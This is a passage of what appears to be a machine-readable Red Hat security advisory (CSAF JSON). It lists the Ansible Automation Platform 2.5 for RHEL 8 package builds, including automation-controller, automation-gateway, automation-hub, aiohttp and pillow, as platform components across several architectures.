"product_id": "8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.aarch64"
},
"product_reference": "automation-controller-0:4.6.31-1.el8ap.aarch64",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-0:4.6.31-1.el8ap.ppc64le as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.ppc64le"
},
"product_reference": "automation-controller-0:4.6.31-1.el8ap.ppc64le",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-0:4.6.31-1.el8ap.s390x as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.s390x"
},
"product_reference": "automation-controller-0:4.6.31-1.el8ap.s390x",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-0:4.6.31-1.el8ap.src as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.src"
},
"product_reference": "automation-controller-0:4.6.31-1.el8ap.src",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-0:4.6.31-1.el8ap.x86_64 as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.x86_64"
},
"product_reference": "automation-controller-0:4.6.31-1.el8ap.x86_64",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-cli-0:4.6.31-1.el8ap.noarch as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.5:automation-controller-cli-0:4.6.31-1.el8ap.noarch"
},
"product_reference": "automation-controller-cli-0:4.6.31-1.el8ap.noarch",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-server-0:4.6.31-1.el8ap.noarch as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.5:automation-controller-server-0:4.6.31-1.el8ap.noarch"
},
"product_reference": "automation-controller-server-0:4.6.31-1.el8ap.noarch",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-ui-0:4.6.31-1.el8ap.noarch as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.5:automation-controller-ui-0:4.6.31-1.el8ap.noarch"
},
"product_reference": "automation-controller-ui-0:4.6.31-1.el8ap.noarch",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-venv-tower-0:4.6.31-1.el8ap.aarch64 as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.aarch64"
},
"product_reference": "automation-controller-venv-tower-0:4.6.31-1.el8ap.aarch64",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-venv-tower-0:4.6.31-1.el8ap.ppc64le as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.ppc64le"
},
"product_reference": "automation-controller-venv-tower-0:4.6.31-1.el8ap.ppc64le",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-venv-tower-0:4.6.31-1.el8ap.s390x as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.s390x"
},
"product_reference": "automation-controller-venv-tower-0:4.6.31-1.el8ap.s390x",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-venv-tower-0:4.6.31-1.el8ap.x86_64 as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.x86_64"
},
"product_reference": "automation-controller-venv-tower-0:4.6.31-1.el8ap.x86_64",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-eda-controller-0:1.1.21-1.el8ap.noarch as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el8ap.noarch"
},
"product_reference": "automation-eda-controller-0:1.1.21-1.el8ap.noarch",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-eda-controller-0:1.1.21-1.el8ap.src as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el8ap.src"
},
"product_reference": "automation-eda-controller-0:1.1.21-1.el8ap.src",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-eda-controller-base-0:1.1.21-1.el8ap.noarch as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-0:1.1.21-1.el8ap.noarch"
},
"product_reference": "automation-eda-controller-base-0:1.1.21-1.el8ap.noarch",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-eda-controller-base-services-0:1.1.21-1.el8ap.noarch as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-services-0:1.1.21-1.el8ap.noarch"
},
"product_reference": "automation-eda-controller-base-services-0:1.1.21-1.el8ap.noarch",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-eda-controller-event-stream-services-0:1.1.21-1.el8ap.noarch as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-event-stream-services-0:1.1.21-1.el8ap.noarch"
},
"product_reference": "automation-eda-controller-event-stream-services-0:1.1.21-1.el8ap.noarch",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-eda-controller-worker-services-0:1.1.21-1.el8ap.noarch as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-worker-services-0:1.1.21-1.el8ap.noarch"
},
"product_reference": "automation-eda-controller-worker-services-0:1.1.21-1.el8ap.noarch",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-gateway-0:2.5.20260804-1.el8ap.noarch as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el8ap.noarch"
},
"product_reference": "automation-gateway-0:2.5.20260804-1.el8ap.noarch",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-gateway-0:2.5.20260804-1.el8ap.src as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el8ap.src"
},
"product_reference": "automation-gateway-0:2.5.20260804-1.el8ap.src",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-gateway-config-0:2.5.20260804-1.el8ap.noarch as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.5:automation-gateway-config-0:2.5.20260804-1.el8ap.noarch"
},
"product_reference": "automation-gateway-config-0:2.5.20260804-1.el8ap.noarch",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-gateway-proxy-0:2.5.10-7.el8ap.aarch64 as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.aarch64"
},
"product_reference": "automation-gateway-proxy-0:2.5.10-7.el8ap.aarch64",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-gateway-proxy-0:2.5.10-7.el8ap.ppc64le as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.ppc64le"
},
"product_reference": "automation-gateway-proxy-0:2.5.10-7.el8ap.ppc64le",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-gateway-proxy-0:2.5.10-7.el8ap.s390x as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.s390x"
},
"product_reference": "automation-gateway-proxy-0:2.5.10-7.el8ap.s390x",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-gateway-proxy-0:2.5.10-7.el8ap.src as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.src"
},
"product_reference": "automation-gateway-proxy-0:2.5.10-7.el8ap.src",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-gateway-proxy-0:2.5.10-7.el8ap.x86_64 as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.x86_64"
},
"product_reference": "automation-gateway-proxy-0:2.5.10-7.el8ap.x86_64",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.aarch64 as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.aarch64"
},
"product_reference": "automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.aarch64",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.ppc64le as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.ppc64le"
},
"product_reference": "automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.ppc64le",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.s390x as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.s390x"
},
"product_reference": "automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.s390x",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.x86_64 as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.x86_64"
},
"product_reference": "automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.x86_64",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-gateway-proxy-server-0:2.5.10-7.el8ap.aarch64 as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.aarch64"
},
"product_reference": "automation-gateway-proxy-server-0:2.5.10-7.el8ap.aarch64",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-gateway-proxy-server-0:2.5.10-7.el8ap.ppc64le as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.ppc64le"
},
"product_reference": "automation-gateway-proxy-server-0:2.5.10-7.el8ap.ppc64le",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-gateway-proxy-server-0:2.5.10-7.el8ap.s390x as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.s390x"
},
"product_reference": "automation-gateway-proxy-server-0:2.5.10-7.el8ap.s390x",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-gateway-proxy-server-0:2.5.10-7.el8ap.x86_64 as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.x86_64"
},
"product_reference": "automation-gateway-proxy-server-0:2.5.10-7.el8ap.x86_64",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.aarch64 as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.aarch64"
},
"product_reference": "automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.aarch64",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.ppc64le as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.ppc64le"
},
"product_reference": "automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.ppc64le",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.s390x as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.s390x"
},
"product_reference": "automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.s390x",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.x86_64 as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.x86_64"
},
"product_reference": "automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.x86_64",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-gateway-server-0:2.5.20260804-1.el8ap.noarch as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.5:automation-gateway-server-0:2.5.20260804-1.el8ap.noarch"
},
"product_reference": "automation-gateway-server-0:2.5.20260804-1.el8ap.noarch",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-hub-0:4.10.17-1.el8ap.noarch as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el8ap.noarch"
},
"product_reference": "automation-hub-0:4.10.17-1.el8ap.noarch",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-hub-0:4.10.17-1.el8ap.src as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el8ap.src"
},
"product_reference": "automation-hub-0:4.10.17-1.el8ap.src",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-aiohttp-0:3.14.1-2.el8ap.aarch64 as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.aarch64"
},
"product_reference": "python3.12-aiohttp-0:3.14.1-2.el8ap.aarch64",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-aiohttp-0:3.14.1-2.el8ap.ppc64le as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.ppc64le"
},
"product_reference": "python3.12-aiohttp-0:3.14.1-2.el8ap.ppc64le",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-aiohttp-0:3.14.1-2.el8ap.s390x as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.s390x"
},
"product_reference": "python3.12-aiohttp-0:3.14.1-2.el8ap.s390x",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-aiohttp-0:3.14.1-2.el8ap.src as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.src"
},
"product_reference": "python3.12-aiohttp-0:3.14.1-2.el8ap.src",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-aiohttp-0:3.14.1-2.el8ap.x86_64 as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.x86_64"
},
"product_reference": "python3.12-aiohttp-0:3.14.1-2.el8ap.x86_64",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.aarch64 as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.aarch64"
},
"product_reference": "python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.aarch64",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.ppc64le as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.ppc64le"
},
"product_reference": "python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.ppc64le",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.s390x as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.s390x"
},
"product_reference": "python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.s390x",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.x86_64 as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.x86_64"
},
"product_reference": "python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.x86_64",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.aarch64 as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.aarch64"
},
"product_reference": "python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.aarch64",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.ppc64le as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.ppc64le"
},
"product_reference": "python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.ppc64le",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.s390x as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.s390x"
},
"product_reference": "python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.s390x",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.x86_64 as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.x86_64"
},
"product_reference": "python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.x86_64",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-daphne-0:4.2.2-1.el8ap.noarch as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el8ap.noarch"
},
"product_reference": "python3.12-daphne-0:4.2.2-1.el8ap.noarch",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-daphne-0:4.2.2-1.el8ap.src as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el8ap.src"
},
"product_reference": "python3.12-daphne-0:4.2.2-1.el8ap.src",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-galaxy-ng-0:4.10.17-1.el8ap.noarch as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el8ap.noarch"
},
"product_reference": "python3.12-galaxy-ng-0:4.10.17-1.el8ap.noarch",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-galaxy-ng-0:4.10.17-1.el8ap.src as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el8ap.src"
},
"product_reference": "python3.12-galaxy-ng-0:4.10.17-1.el8ap.src",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-pillow-0:12.3.0-1.el8ap.aarch64 as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.aarch64"
},
"product_reference": "python3.12-pillow-0:12.3.0-1.el8ap.aarch64",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-pillow-0:12.3.0-1.el8ap.ppc64le as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.ppc64le"
},
"product_reference": "python3.12-pillow-0:12.3.0-1.el8ap.ppc64le",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-pillow-0:12.3.0-1.el8ap.s390x as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.s390x"
},
"product_reference": "python3.12-pillow-0:12.3.0-1.el8ap.s390x",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-pillow-0:12.3.0-1.el8ap.src as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.src"
},
"product_reference": "python3.12-pillow-0:12.3.0-1.el8ap.src",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-pillow-0:12.3.0-1.el8ap.x86_64 as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.x86_64"
},
"product_reference": "python3.12-pillow-0:12.3.0-1.el8ap.x86_64",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.aarch64 as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.aarch64"
},
"product_reference": "python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.aarch64",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.ppc64le as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.ppc64le"
},
"product_reference": "python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.ppc64le",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.s390x as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.s390x"
},
"product_reference": "python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.s390x",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.x86_64 as a component of Red Hat Ansible Automation Platform 2.5 for RHEL 8",
